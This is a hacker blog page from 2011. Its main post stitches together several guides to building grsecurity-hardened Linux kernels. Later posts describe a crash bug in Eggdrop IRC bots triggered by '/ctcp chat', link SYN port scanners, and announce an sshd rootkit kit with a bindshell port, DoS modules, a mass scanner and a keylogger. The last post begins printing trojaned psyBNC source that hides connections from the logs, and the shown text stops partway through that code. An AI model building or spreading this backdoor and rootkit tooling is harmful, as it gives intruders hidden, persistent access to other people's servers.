comments: 1 » tags: exploit ac1db1tch3z ABftw hack hacked owned own3d 0wn pwnd s3l1nux selinux ldt idt wtf-is-this-poc PoC code

Building a GRSEC Kernel (3-4 ways)..

Posted on 29th September 2011 in Codes, Papers

I initially had this done, with my OWN shell box, on one kernel, but i cannot find it, i did find an exact same application of it though, so i am putting a few together and, here is the result..
Note , there is a few different things shown here, ultimately, you want to have a kernel thats on a nice medium-sec or high
setting.
There is links and refs added to 3 different GOOD guides, and i had my own, wich was a walkthrough of me actually setting up a box with it on a 2.4.8 or so kernel,yes abit old but patches are better at this level.
You also must take heed that grsec CAN be bypassed, if someone REALLLLY wants your box, and it is not running the proper versions, you may have problems.. there is abit more abou this regarding grsec and also regarding ACl-Bypass i have found on my own , wich break the chroot() and break a ‘gorilla-grsec’ 2.6.18 kernel..but, now grsec has another attacker,Dan
Rosenwhatever and Jon.O have attacked Spender, the prix have used a shitty little bug wich was more like,they studied and
dissected grsec for solong, and still posted a failed PoC online, theyre StackJacking, is a friggen joke, wether they cripple it on purpose, or theyre just idiots, but, i know for fact Spender knew of some bugs, and was already working on BETTER patches, them two pricks used some conversations re grsec kernel, to basically attack it.. so from a friendly chat, to bang hitting the grsec framework,and, not just once oh no…the DJBliss idiot,even tried to create a small ‘backdoor’ for SOME users,trying to trick Spender, but sorry, spender knowz the codez… better than you two every ever will. You used chater and friendliness, to launch the attack just to gain some notoriety at a snoggy little security conf,ofc it was patched,but the patch was meant to be better, so in fact, they have kinda ruined some versions of grsec, so, id choose wisely, and, maybe look at a higher 2.6.36+ kernel base to use. this is just my own notes…
cheers,
xd

NOTE: Cheers to the people who did these,Im spewing myn
isnt here,it shows how to apply iptable patch and also, howto use it, but, before you embark,please read ALL the Post..not just abit of it.
Thankyou.
xd

Installing a grsec-patched kernel on a CentOS5 or RHEL5
Here’s my little guide for upgrading a CentOS server to a grsec-patched kernel.
At the time of this writing, this was the latest stable grsec patch available.

Fetch the sources (these can be used universally,
ie: change a few numbers):
wget http://kernel.org/pub/linux/kernel/v2.6/linux-2.6.24.5.tar.bz2
wget http://grsec.linux-kernel.at/grsecurity-2.1.11-2.6.24.5-200804211829.patch.gz

Extract:
tar xjf linux-2.6.24.5.tar.gz
gzip -d grsecurity-2.1.11-2.6.24.5-200804211829.patch.gz

Patch the kernel:
patch -p0 < grsecurity-2.1.11-2.6.24.5-200804211829.patch
cd linux-2.6.24.5 && make clean && make mrproper

Copy the previous kernel config to use:
cp /boot/config-`uname -r` .config

Edit your kernel:
make menuconfig

Here’s a few of the things I disable (there’s a lot more I could do, but I find the more restrictive I am, the less well

things work) :
Networking > Amateur Radio support
Networking > IrDA (infrared) support
Networking > Bluetooth subsystem support
Networking > Wireless
Device Drivers > ISDN support
Device Drivers > Telephony support
Device Drivers > Multimedia devices
Device Drivers > Sound

Also, don’t forget to configure the Grsecurity option under Security Options.

Compile your kernel and install it:
make && make modules && make modules_install && make install

Make sure it’s working ok
depmod 2.6.24.5-grsec

Edit /boot/grub/menu.lst with your text editor of choice, add in your kernel:
$EDITOR /boot/grub/menu.lst

Lastly, you reboot:
shutdown -r now

……………….and now a couple different kernels of debian, another popular place for kiddies to run around in… (xd)

DEBIAN (Compile from src):
Compile Debian Kernel with GRSEC — cisc0ninja

Prerequisites:
You have installed the following software/commands:
make, gcc, g++, libncurses5, libncurses5-dev, patch, and there’s probably more but I can’t think of anything right now.
***NOW W/SPARC SUPPORT!!! (see below for details)
PLEASE BE SURE TO MAKE ALL THINGS UP TO DATE AND ASSUMING YOU HAVE ALL APPZ INSTALLED!@ (xd)

This part is for compiling a Debian Linux kernel on x86/amd64 with GRSEC

Step 1:
Download the latest version of Grsecurity and download the latest working stable kernel that goes with it.
(from the 2 links below I put as references) or try:

http://kernel.org/linux-kernel-2.6.24.5.tar.gz

http://grsecurity.net/

Step 2:
Move the 2 compressed files to the directory /usr/src/
Uncompress both files using tar -zxvf for the kernel (example: linux-kernel-2.6.24.5.tar.gz)
and gunzip to turn grsecurity-2.1.11-2.4.36.2-200804211830.patch.gz into grsecurity-2.1.11-2.4.36.2-200804211830.patch
gunzip -d grsecurity-2.1.11-2.4.36.2-200804211830.patch.gz

Step 3:
Patch the kernel source with the grsec code by executing command: patch -p0 < grsecurity-2.1.11-2.4.36.2-200804211830.patch
If you want you can add in the grsec iptables patch as well using the same method.

NOTE: Universal IPtable patch: http://wolfram.schlich.org/linux/misc/kernel/grsecurity/grsecurity-2.2.0-iptables.patch (xd)

Step 4:
Exec the command: make menuconfig
Choose the drivers etc, that you wish to be built into your kernel.Note, do NOT bloat it or it will load tomuch and clashes
will likely occur -xd
You can tell what needs to be built in to your kernel based on a few commands such as lspci, lsmod, etc.

There are some that are dependent on each other for instance:

c@box:/# lsmod
Module Size Used by
thermal_sys 9378 processor, fan, thermal

c@box:/# modinfo thermal
filename: /lib/modules/2.6.32-5-686/kernel/drivers/acpi/thermal.ko
license: GPL
description: ACPI Thermal Zone Driver
author: Paul Diefenbaugh
alias: acpi*:LNXTHERM:*
depends: thermal_sys
vermagic: 2.6.32-5-686 SMP mod_unload modversions 686
parm: act:Disable or override all lowest active trip points. (int)
(etc.. concatenated b/c I'm not going to type all this shit out and you guys get the point)

So in this instance you need to add the thermal module to be built in, as well as select for thermal_sys to be built in.
One may be listed under acpi options and the others may be listed under device drivers generic thermal sysfs driver.

Don't select them to be modules because we're not going to be using an initrd image for this install. If you choose to

actually do an initrd image then it's still good to build in the drivers that the system actually needs and just place other

drivers as modules.
For instance the system has an intel nic but I think I'll be adding another nic later, probably a 3com so I'll build
in the intel nic and maybe make the 3com a module since I don't have it now but may later.
That is called a modular kernel.If your b0x doesn't boot properly at the end of this it's because you either didn't
build in everything you needed or built too much options in and it's nuking itself.
Don't forget to actually configure the options you want in the Grsec and PaX portions of the config
(that's the actual security part of it we're aiming for here)!

Step 5:
Save your config and then type make and press enter.
When that is through type:
make
make modules
make modules_install
make bzImage
and finally make install

***In some cases you may need to also do a make firmware & make firmware_install
Technically if you are building a monolithic kernel and building all the drivers, etc.into the kernel and not
compiling anything as modules you can omit the make modules and make modules_install commands but I think you still need to

do atleast:
make
make bzImage
depmod -a
make install

Step 6:
Update grub with the command: update-grub
But watch out! Sometimes grub has a funny way of reading things!
If your previous line in menu.lst or grub.cfg says:
root=UUID 2345o05te4wtftlk43tjg ro quiet
type the command mount in a normal shell like bash.

If mount is showing root as /dev/sda1 then in your menu.lst file you can say root=/dev/sda1 ro quiet instead of the UUID etc.
Sometimes it needs this instead to boot properly.
The reason is that you can't use UUID's without an initrd image (the UUID's are blkid's that get taken from commands
like mount which happen after the kernel is booted;
so you need to specify the drive and partition such as root=/dev/sda1 or whatever your root partition is.
As well, you also need to change your /etc/fstab to show /dev/sda1 / ext4 defaults 0 1 instead of it saying
UUID=(long number) / ext4 defaults 0 1
NOTE: This needs to be done for all partitions in /etc/fstab.

Step 7:
Reboot into your new Monolithic Debian Linux Kernel complete with Grsec and NO nasty initrd image!

Step 8:
If you are having a hard time getting this to work, you may decide to try with an initrd image.
You can do this by issueing the following command:
update-initramfs -c -k
example:
update-initramfs -c -k 2.6.39.2-grsec

Don't forget that if you decide to use an initrd image you need to add support for it back in to the kernel when you do your

make menuconfig assuming you took it out earlier.
****************************************************************************************************************
This part is for compiling a Debian Linux kernel on SPARC with GRSEC

Most of the information is fairly the same with the exception that when you compile you use this instead:
make clean && make vmlinux image modules modules_install
or
make vmlinux && make image modules modules_install

Then to make it bootable you have to:
cp arch/sparc/boot/image /boot/vmlinux-2.x.x.x-grsec
cp System.map /boot/System.map-2.x.x.x-grsec
cd /boot
rm -rf vmlinuz (which should be a sym link to your old vmlinuz file)
ln -s vmlinuz-2.x.x.x-grsec vmlinuz
vi silo.conf
remove the line initrd=

example silo.conf file:
partition = 1 # Boot partition (= root partition)
root = /dev/sda1 # Root partition
timeout = 150 # Wait 15 seconds before booting the default section
default=Linux
read-write

image=/boot/vmlinuz
label=Linux

image=/boot/vmlinuz-2.x.x.x-old
label=LinuxOLD
initrd=/boot/initrd32.img

//e0f end of paper

Type the command silo and it will check to make sure your silo.conf file is usable.
Then reboot in to your new linux on sparc custom kernel!

Thanks to RaT, Spender, and Dave M. for all your assistance and help with this!
-cisc0ninja

Ref links , use these to get hold of the kernel and patchset you wish to use..remember,you DONT HAVE to use this kernel vers:

http://www.grsecurity.net/

http://www.kernel.org/

http://www.securityfocus.com/infocus/1551

http://www.howtoforge.com/hardening-the-linux-kernel-with-grsecurity-debian

http://vger.kernel.org/~davem/cgi-bin/blog.cgi

http://www.debian.org/doc/manuals/debian-reference/ch09.en.html#_the_kernel

Spender's directory (http://grsecurity.net/~spender/) - includes a quickstart guide to grsecurity.
Grsecurity Config Help (http://grsecurity.net/confighelp.php) - list of all the grsec config options and what they do.

and...a different kernel...

This is based on the same walkthrough posted for grsecurity on redhat based kernels except this is for debian based kernels.
The current stable debian kernel is vuln to about all of the new local exploits and if you are running the 2.4 kernel
you are vuln to even more.Debian even had one of their servers hacked with the local root exploits,they only released
a patched kernel for the testing branch to my knowledge.
Ok so here goes with this debian walkthrough it is rather easy (xd)

If you have not done any compiling or built any kernels you must get the packages needed:
sudo apt-get install build-essential bin86 kernel-package
sudo apt-get install libqt3-headers libqt3-mt-dev (needed for make xconfig)

First get what is needed and patch the kernel.

cd /usr/src
wget http://www.kernel.org/pub/linux/kernel/v2.6/linux-2.6.17.7.tar.bz2
wget http://grsecurity.org/grsecurity-2.1.9-2.6.17.7-200607261817.patch.gz
tar -xjvf linux-2.6.17.7.tar.bz2
gunzip < grsecurity-2.1.9-2.6.17.7-200607261817.patch.gz | patch -p0
mv linux-2.6.17.7 linux-2.6.17.7-grsec
ln -s linux-2.6.17.7-grsec linux
cd linux

copy your current config over

do uname -r to see what kernel your running and copy it, example:
cp /boot/config-2.6.15-26-686L .config

*Configure the kernel:
sudo make xconfig

if you are doing this on a server use makeconfig make sure you select the basic stuff that is needed,iptables,
your processor type, and then go in Security Options and to grsecurity,select which level of security you want and
any other options you may want.

*In a terminal make sure you are in /usr/src/linux with full root access.
We will build a ".deb" file that can be installed in our Ubuntu system, using make-kpkg.

*In a terminal type:
make-kpkg clean
make-kpkg -initrd --revision=ck2 kernel_image

If there wasn't errors this will build the kernel and a ".deb" file will be created at /usr/src.
*To install it:
sudo dpkg -i kernel-image-2.6.17*.deb

Now reboot and if you did everything correctly it should boot back up and you will be using the new grsecurity kernel.

....one more and thatll do it!

I am going to list down those steps that I used to compile my own kernel version 2.4.31 with
grsecuirty 2.1.6-2.4.31-200506141150 patch.
This is mainly for Red Hat Linux and will work on version 7.2, 7.3, 8.0 & 9.
I have also used these steps for Fedora Core 1 and CentOS 3.x.
Actually some of these steps can be used for any linux distr0s provided you know what you are doing.

Before you try these steps, you must have some experiences to compile your own kernel from source and have some basic understanding about LILO http://www.google.com.sg/search?hl=en&ie=UTF-8&oe=UTF-8&q=lilo+HOWTO&btnG=Google+Search&meta=
or GRUB http://www.google.com.sg/search?hl=en&ie=UTF-8&oe=UTF-8&q=grub+HOWTO&btnG=Google+Search&meta=

NOTE: Im using LILO as an example here.

It is a good idea that you update your system first using up2date before this. Here is my little up2date HOWTO

http://www.webhostingtalk.com/showthread.php?s=&threadid=227083.

FOLLOW THIS GUIDE AT YOUR OWN RISK AS I AM NOT RESPONSIBLE IN ANY DAMAGES CAUSED! YOU HAVE BEEN WARNED!!!

BEFORE YOU BEGIN
Before we build our custom kernel, you'll need to know what's in your server. Issue the following command as root to get the necessary names of your hardware, their PCI addresses, and their IRQs:
lspci
An example result for one of my server:

00:00.0 Host bridge: Intel Corp.: Unknown device 2578 (rev 02)
00:01.0 PCI bridge: Intel Corp.: Unknown device 2579 (rev 02)
00:03.0 PCI bridge: Intel Corp.: Unknown device 257b (rev 02)
00:1d.0 USB Controller: Intel Corp. 82801EB USB (Hub #1) (rev 02)
00:1d.1 USB Controller: Intel Corp. 82801EB USB (Hub #2) (rev 02)
00:1d.2 USB Controller: Intel Corp. 82801EB USB (Hub #3) (rev 02)
00:1d.3 USB Controller: Intel Corp. 82801EB USB EHCI Controller #2 (rev 02)
00:1d.7 USB Controller: Intel Corp. 82801EB USB EHCI Controller (rev 02)
00:1e.0 PCI bridge: Intel Corp. 82801BA/CA/DB PCI Bridge (rev c2)
00:1f.0 ISA bridge: Intel Corp. 82801EB ISA Bridge (LPC) (rev 02)
00:1f.1 IDE interface: Intel Corp. 82801EB ICH5 IDE (rev 02)
00:1f.2 RAID bus controller: Intel Corp.: Unknown device 24df (rev 02)
00:1f.3 SMBus: Intel Corp. 82801EB SMBus (rev 02)
02:01.0 Ethernet controller: Intel Corp.: Unknown device 1019
03:06.0 VGA compatible controller: ATI Technologies Inc Rage XL (rev 27)
03:08.0 Ethernet controller: Intel Corp. 82801EB (ICH5) PRO/100 VE Ethernet Controller (rev 01)
Now you can find more information related to the hardware shown above by issuing the following command:
lspci -s 03:08.0 -vv

The output for the above as below:
03:08.0 Ethernet controller: Intel Corp. 82801EB (ICH5) PRO/100 VE Ethernet Controller (rev 01)
Subsystem: Intel Corp.: Unknown device 342a
Control: I/O+ Mem+ BusMaster+ SpecCycle- MemWINV+ VGASnoop- ParErr- Stepping- SERR+ FastB2B-
Status: Cap+ 66Mhz- UDF- FastB2B+ ParErr- DEVSEL=medium >TAbort- SERR- Latency: 32 (2000ns min, 14000ns max), cache line size 08
Interrupt: pin A routed to IRQ 20
Region 0: Memory at feafe000 (32-bit, non-prefetchable) size=4K
Region 1: I/O ports at bc00 size=64
Capabilities: [dc] Power Management version 2
Flags: PMEClk- DSI+ D1+ D2+ AuxCurrent=0mA PME(D0+,D1+,D2+,D3hot+,D3cold+)
Status: D0 PME-Enable- DSel=0 DScale=2 PME-

You can use lsmod and cat /proc/interrupts to find out more about your current modules etc.
After you have all the necessary information, you can search for it at Google with a query such as linux 82801EB to
know which modules name to use for your hardware.

Ok, here we start...
As root, do the following steps in order:
INSTALL DEPENDENCIES AND PACKAGES
Step 1: Install gcc and all its dependencies packages
We need gcc to compile kernel.
Simply run this command to install if it is not installed gcc and all its dependencies:
up2date gcc
OR if you are using Fedora you can use up2date or yum:
yum install gcc

Step 2: Install ncurses-devel and all its dependencies packages

ncurses-devel package is needed while compiling kernel from source specially for running make menuconfig:
up2date ncurses-devel
OR if you are using Fedora you can use up2date or yum:
yum install ncurses-devel

Step 3: Install patch package
You need patch package to be install so that you can use it to patch the kernel source:
up2date patch

OR if you are using Fedora you can use up2date or yum:
yum install patch

Step 1: Change your current working directory
For me, I choose to download the kernel to /usr/local/src but you are free to choose a directory to store and
build/compile your kernel.

cd /usr/local/src
Step 2: Download the latest stable kernel version 2.4.x series which is 2.4.31
wget -c http://www.kernel.org/pub/linux/kernel/v2.4/linux-2.4.31.tar.bz2
Step 3: Download the grsecurity patch
wget -c http://www.grsecurity.net/grsecurity-2.1.6-2.4.31-200506141150.patch.gz
Step 4: Unpack the kernel source
tar xvfj linux-2.4.31.tar.bz2
Step 5: Patch the kernel source with grsecurity patch
gunzip < grsecurity-2.1.6-2.4.31-200506141150.patch.gz | patch -p0
Step 6: Change your current working directory to the kernel source directory
cd linux-2.4.31
Step 7: Clean your kernel source configuration etc...
make clean && make mrproper
Step 8: Use your current configuration to configure your new kernel

You might want to backup your current kernel modules and config.
cp /boot/config-`uname -r` .config
make oldconfig
make menuconfig

NOTE THIS SH*T IZ IMPORTANT (SEC LEVELS) -xd- :
When you config your kernel configuration using make oldconfig to use the current booted kernel configuration,
please set CONFIG_CRYPTO=y and CONFIG_CRYPTO_SHA256=y within the CRYPTO option and nothing else within it.
Then when you come to GRSECURITY option,set it to y and in Security level option can be set to Low,Medium or High.
I set mine to Medium.
The following are the explanation for each option:

Low additional security
If you choose this option, several of the grsecurity options will be enabled that will give you greater protection against a number of attacks, while assuring that none of your software will have any conflicts with the additional security measures. If you run a lot of unusual software, or you are having problems with the higher security levels, you should say Y here. With this option, the following features are enabled:

linking restrictions
fifo restrictions
random pids
enforcing nproc on execve()
restricted dmesg
random ip ids
enforced chdir("/") on chroot

Medium additional security
If you say Y here, several features in addition to those included in the low additional security level will be enabled.
These features provide even more security to your system,though in rare cases they may be incompatible with very old
or poorly written software.If you enable this option,makesure that your auth service (identd) is running as gid 10
(usually group wheel).With this option the following features (in addition to those provided in the low additional
security level) will be enabled:

random tcp source ports
failed fork logging
time change logging
signal logging
deny mounts in chroot
deny double chrooting
deny sysctl writes in chroot
deny mknod in chroot
deny access to abstract AF_UNIX sockets out of chroot
deny pivot_root in chroot
denied writes of /dev/kmem, /dev/mem, and /dev/port
/proc restrictions with special gid set to 10 (usually wheel)
address space layout randomization
removal of addresses from /proc/ /[maps|stat]

High additional security
If you say Y here, many of the features of grsecurity will be enabled, that will protect you against many kinds of
attacks against your system.The heightened security comes at a cost of an increased chance of incompatibilities with
rare software on your machine.Since this security level enables PaX,you should view http://pax.grsecurity.net and read
about the PaX project.While you are there,download chpax and run it on binaries that cause problems with PaX.
Also remember that since the /proc restrictions are enabled,you must run your identd as group wheel (gid 10).
This security level enables the following features in addition to those listed in the low and medium security levels:

additional /proc restrictions
chmod restrictions in chroot
no signals, ptrace, or viewing processes outside of chroot
capability restrictions in chroot
deny fchdir out of chroot
priority restrictions in chroot
segmentation-based implementation of PaX
mprotect restrictions
kernel stack randomization
mount/unmount/remount logging
kernel symbol hiding

If you need to customized the Grsecurity options, you will need to run make menuconfig then go to Grsecurity option there and set the Security level to Customized and you are on your own since I am not a grsecurity guru..

Many thanks to BigGorilla for more info about grsec config:
Spender’s directory (http://grsecurity.net/~spender/) – includes a quickstart guide to grsecurity.
Grsecurity Config Help (http://grsecurity.net/confighelp.php) – list of all the grsec config options and what they do.

It is also a good idea for you to run make menuconfig so that you can disable one or more of the following which you have to make sure you really don’t need it:
Telephony Support
Fusion MPT device support
IEEE 1394 (FireWire) support (EXPERIMENTAL)
Amateur Radio support
IrDA (infrared) support
ISDN subsystem
Multimedia devices
Sound
USB support
Old CD-ROM drivers (not SCSI, not IDE)
Bluetooth support
Library routines
Step 9: make dep
make dep
Setp 10: make bzImage
nohup make bzImage &
You will see something like:
nohup: appending output to `nohup.out’
Just press ENTER then issue this command to view the nohup.out
tail -f nohup.out

To exit from the above, use CTRL+C keys.
Check for any errors and when in doubt dont continue.
Use the error message as the search terms to do your search at google might help.

Step 11: make modules & make modules_install
Bring up another new xterm shell window and follow these steps:
This step is required ONLY if you had enabled Loadable module support in step “Configure Step” above.
Loadable module are located in /lib/modules.You MUST do this step if you enabled or disabled any modules,
otherwise you will get ‘unresolved symbols’ errors during or after kernel boot do:
nohup make modules 1> modules.out 2> modules.err &

Step 12: Check for errors
Make modules will take several minutes depending on your server specs.
If you are curious about whether did make modules finish, issue ps auwx|grep make to check.
Once you know that make modules finishes, check all the previous makes.
less nohup.out
less modules.err
less modules.out

Again check for any errors and when in doubts do not continue.
Use the error message as the search terms to do your search at google might helps you.

Step 13: Install the modules
After checking and there is no error for make bzImage and make modules,it is time to install your newly built modules.
make modules_install

Step 14: Bootloader and others
cp .config /boot/config-2.4.31-grsec
cp arch/i386/boot/bzImage /boot/vmlinuz-2.4.31-grsec
cp System.map /boot/System.map-2.4.31-grsec
mkinitrd /boot/initrd-2.4.31-grsec.img 2.4.31-grsec

If you are using LILO as your bootloader, edit your /etc/lilo.conf file to add this new kernel but do not set it as default boot kernel.
An example as below:

image=/boot/vmlinuz-2.4.31-grsec
label=2.4.31-grsec
append=”root=LABEL=/”
read-only
initrd=/boot/initrd-2.4.31-grsec.img
If you are using GRUB as your bootloader, edit /boot/grub/grub.conf file to add this new kernel but do not set it as default boot kernel. An example as below:
title Red Hat Linux (2.4.31-grsec)
root (hd0,0)
kernel /vmlinuz-2.4.31-grsec ro root=LABEL=/
initrd /initrd-2.4.31-grsec.img
Step 15: Test your new kernel
If you are using LILO, use the following command to check errors and update your LILO:
lilo -v -v
lilo
Then set LILO to boot to the new kernel for the next reboot:
lilo -R 2.4.31-grsec

If you are using GRUB, check out this thread (http://www.webhostingtalk.com/showthread.php?s=&threadid=235241)
Assume your default boot kernel is in the first entry among the rest of the kernels.
Add your new kernel in the first entry among the rest of the kernels (on top of your first original kernel which is the first entry before changes). You just change default=1 and fallback=2.
grub shell
grub> savedefault –default=0 –once
grub> quit

Then reboot:
reboot
If your system unable to boot up to the new kernel or causing all type of errors, then you have to reboot the server back to its default/old kernel. Thus it is good to have Remote Reboot Port (RRP) or APC MasterSwitch or similiar so that you don’t have to call up your provider just for a reboot. Alternatively you can ask your provider to test your new kernel for you.
If the system is able to boot to your new kernel, please use lsmod, dmesg, cat /var/log/boot.log etc… to check any errors. Leave the system there running with this new kernel at least for a week to test for any errors before setting it as the default kernel.
Again, NEVER set your new kernel as default boot kernel until you have tested it and run FINE for a period of time like a week or so to make sure that your kernel is stable with no error.

References:
Grsecurity (http://www.grsecurity.net/)
Grsecurity Features (http://www.grsecurity.net/features.php)
Kernel (http://kernel.org/)
Kernel HOW TO (http://en.tldp.org/HOWTO/Kernel-HOWTO.html)
Kernel Trap (http://www.kerneltrap.org/)
Kernel Newbies (http://www.kernelnewbies.org/)
Upgrading the Linux Kernel on Red Hat Linux systems (http://www.redhat.com/support/resources/howto/kernel-upgrade/)
Grsecurity at SecurityFocus.com (http://www.securityfocus.com/infocus/1551)

Thats it! go and make some gentle grsecx!
xd

comments: 5 »

Tools to make a W0RKING VS6 setup that r0x

Posted on 29th September 2011 in Papers

ATM the apps/tools wich MS gives out, for free, and, i believe that could be linked to, instead i compressed them..I could VERY simply change those links in tut.htm, to point directly to files, do u want me to make it even easier, and seem more legal do you ?
or, should i just leave things..for those who care… enough.
SO NO TOOLS UNLES U HAV PAGE or, simply use a LINKTO up top of the mainpage
I will point the same tools, directly to the actual free ones wich ms has for dl when i hve a spare minute
Had fun thinking i was giving out some kinda torrent or somethin ? Thanks for spoiling a rather, good post actually.

/// oops! what where… i will maybe put it up again when it is not ‘picked on’ somuch, about being just about bots, I should have made this more, about using VS6 in a ‘good’ way, with regards to using sockets,threading etc.
Please Login or Register to read the rest of this content.

comments: 12 » tags: bots MSDN SDK sdk tutorial botmaking vs6 cpp c++

MultiThreaded TCP SYNSCAN for Linux/Win32 – LINKTO

Posted on 29th September 2011 in Codes

Hello my friends!
I just thought, this would be a nice and handy tool so, here, i will link it up to here since it looks half decent, it is by some small website like this, and, a small team of ppl again like this, so i try to spread the w0rd when i can..

The post/link here:

http://www.darknet.org.uk/2011/09/multi-threaded-tcp-port-scanner-for-linux-windows/

The download of it here:

http://www.secpoint.com/freetools/threaded-syn-port-scanner-2.0.zip

OH and just incase u thought i dont look for the *best* well, this is KIXASSSS

http://www.stabellini.net/filesystem/sources/unmantained/synscan/synscan-0.1.tar.gz

Enjoy a non-crazycoders.com production but, still a nice scanner nonetheless1 definately good and, better than ss if you have that then you may want to try to convert to a multithread like this one cheers
xd

comments: 10 » tags: scanning mass-scan phpmyadmin scann scan scanners bot bots bottler botti boti hacvker hacking hacks

Eggdrop 1.6.19+ctcpbugfix(and below) ctcp bug

Posted on 26th September 2011 in Exploits

So, i guess you all wondered, how did this work etc etc..and yes, there is a few ‘ways’ i have seen wich, as i saw, none of worked… so i played around, with the 1.6.19+ctcpfix version, YES the ‘fix’ version and what do i find…
well, instead of your usual /dcc chat try /ctcp chat , thats it.
Simple as, and was hiding for long time.. works effectively on eggdrop BSD built, and on RH built, but not tested on ALL packages, altho i suspect the same buffer is responsible for all these bugs, this was even in wraith’s src at one stage i believe,… but fixed much much sooner than eggdrop.. i guess some of your botpax out there, are easy to crasxh!
have phun!
And, modufy the ctcp command, and flooding the unit/target with requests, also works, also fake file dcc sends seem to be accepted, and no, i wont show you this code, but it is VERY simple mirc scripting..
Discovered by who the fk knows,
Exploited by me ,
Credits to whoever else has found this, but, no one else was able to reproduce this properly yet, and, why does this occur, on a darn ctcpfix version :s bad src… the safest way, is to download and use the oldest eggdrop src, wich does NOT suffer from the bug as i know of , and this is dev1.6.8 version wich has ipv6+ssl and, will soon overtake the sillyarse 1.6.20 and below branch… the 1.6.8 somehow was lost and, its confgs alittle different but, i run it on my box… it is secure alternative and simply needs 2 changes to operate same way, that is replacing ip with vhost and ip6 with vhost6… and ppl have not used it, because of that reason…so pathetic.. use this version, so , as they have said, all other versions are buggy, until 1.6.20, anything of those are all buggy, they really want to release a good build of the ipv6+ssl but people refuse to budge, so, i will tell admins of boxes, setup an eggy config maker, and that way, it would b easier..make it advanced as the person would want it to be, so use an advanced configs, and that way, people will use your proper eggy, and not use .patch sets etc for old crap! Oh and maybe reading eggheads.org news might help just alittle ;p
Enjoy the /ctcp chat while it lasts :p
Cheers
xd

My new fav pic:

^^ thats my kinda country!

comments: 3 » tags: Eggdrop irc ircd ctcp bug exploit mirc bouncer socks psyBNC eggy wraith botpack eggypack eggy eggdropz

psyBNC Backdoor (p_socket.c) – Addon for xd-sshd (rKit)

Posted on 26th September 2011 in Codes, Exploits

Hello my friends and fellow coders,
This is probably, going to become a static compiled module in the sshd-rootkit, along with a tool from www.noptrix.net (my friend noptrix codes great kernel/userland/cracking) sniffing,everything i guess that he has on his website,well, I am trying to get this rootkit to be for ‘everyone’ so, this means, why not have a hidden psyBNC ? for those who like BNC, (personally, i dont like it, and will add a bouncer static built (and thats ready too..) wich acts as a socks5 and will listen on a port i wont disclose yet, that module is completed and ready, built statically, and relys on little things, and when the bouncer starts, it hides as a seperate .so file wich is VERY smart made.. so that is one part wich, i will not disclose yet, i need to add a better ‘attachment’ holder to this website, then i will add the socks5-bouncer (it is bouncer, and the code i will also provide, it has webadmin capability if you wish it this way, but the static built one, is only socks5-no user/pass,wich, this might be good to change..) so when i release that, i will also update and makesure the sshd is ready/built and has an installer.sh file or similar, i will also include a mass-scanner for weak phpMyAdmin , wich again, is ready, and, i dont wish to disclose this also yet, that will be a final module, only for users who REALLY want it, or need it even… it will be a 3rde-party addon, more than anything.. main thing, is setting up the sshd right, with pam also, and then getting maybe a bindshell backup port to login to incase of lockdfown… and then, i guess will see… i need to see what more i can do, but atm, it will have a bouncer for sure, a psybnc backdoor (src is this post) here, when it is compiled into psybnc static binary ofc..
So, it will cover what tuixkit does, but better because all psyBNC is properly backdoored and hides, and also, i could hook vihr_user , and use the sshd rootkit hider either way, i will try and get all the main modules done within a week or 2 weeks, then it is a matter of getting that to install cleanly, and ofc, adding just simple things, but, if done right this will be 100% stealthy.
D0S modules, are also present, and those are simply imp,gem,ipv6dos,idetd-dos, cpl of simple but effective ddos modules, wich are already in my hands, (again, along with src), so most of the actual kit, will have src, and, buil;t.. I might also use kcopes sshd backdoor for bsd boxes only, i will see, there is a few options, because the sshd actually runs fine on linux or bsd, or even solaris!
Thats why i like the use of non-free ssh.com sshd, i now will strive to add the other codes, and hook them all into a simple system, and a keystroke logger, this is most important part wich i am yet to add.

ANYHOW, here is the addon for psyBNC for my sshd kit,you will need a copy of psyBNC-2.3.2.tar.gz , then simply apply this and recompile it, correct any flaws, you may need to convert the code to UNIX format, this will cause problems otherwise when applying patches, when the encoding is NON unix, for some OS.
TRY and use that src code, or one of its branches like 2.3.2-1,and there is a few of them, so just play around with it and use whatever one you like, i wont spend alot of time on this, because to me it is not needed, but for some well, it will be a nice addin they will then need to addin a small .sh file, to start the psybnc up, so i guess this is not so easy to addon, then again, you should not be worrying about psyBNC thx to the coder who made this
TO BACKDOOR THE PSYBNC JUST MOVE p_socket.c ON src/ in MAIN PSYBNC DIR then compile!
features: IPv6 support , Backdoor IRC use from ANY box, IPV6 nowdays VERY handy!
ALSO nte, I have pre-added IPV6 DCC support…
if this line errors out, it might be i have wrong name of function,or it is not implemted…
just add // to front of this line if it errors..
if(dcc6host[0]==0) strmncpy(dcc6host,lkm->sock->source,sizeof(dcc6host));

ALSO note that i added no logging, so look @ how i did this, and copy it with anything else
in the psyBNC.. very simple todo and in this module it is all disabled,so our user should
be hidden ,as the connect is not logged.. this could be better i guess, but sofar, it is what it is :s
cheers
xd

/* $Id: p_socket.c,v 1.4 2005/06/04 18:00:14 hisi Exp $ */
/************************************************************************
 *   psybnc2.3.2, src/p_socket.c
 * TO SEE HOW MODIFY THE DIR/FILE WHERE LOG TAKE A LOOK AT LINE
 * SILENTJAVA=fopen("./trojan.log"...) MODIFY THAT TARGET DIR /FILE
 * Feature added by Anonymous@unknown.org fuall
 */
#ifndef lint
static char rcsid[] = "p_socket.c,v 1.4 2011/09/04 11:00:39 [xd] $";
#endif
#define P_SOCKET
#include <p_global.h>

#define MAX_SENDQ 1000  // could change this but meh...

jmp_bufalarmret;
#ifndef BLOCKDNS
int acceptresolved(struct resolve *rp);
int connecthostresolved(struct resolve *rp);
int connectvhostresolved(struct resolve *rp);
int connecthostnotresolved(struct resolve *rp);
#endif

/* gets a socketnode from the corresponding system socket number */
struct socketnodes *previous;
struct socketnodes *getpsocketbysock(int syssock) {
    struct socketnodes *th;
    th=socketnode;
    previous=socketnode;
    while(th!=NULL)
    {
if (th->sock!=NULL) {
    if (th->sock->syssock==syssock) return th;
}
previous=th;
th=th->next;
    }
    return NULL;
}

struct socketnodes *getpsocketbygroup(struct socketnodes *first, unsigned long group, int notsock) {
    struct socketnodes *lkm;
    lkm=first;
    while(lkm)
    {
if(lkm->sock)
    if(lkm->sock->sockgroup==group && lkm->sock->syssock!=notsock && lkm->sock->syssock!=notsocket)
return lkm;
lkm=lkm->next;
    }
    return NULL;
}

/* creates a socket */
int createsocket(int syssock,int type,int index,unsigned long group,int(*constructor)(int),int(*constructed)(int),int(*errorhandler)(int,int),int(*handler)(int),int(*destructor)(int),int(*remapper)(int,int),int proto,int ssl)
{
    struct psockett *th;
    struct socketnodes *lkm;
    int flags,ret;
    int lsock;
    time_t tm;
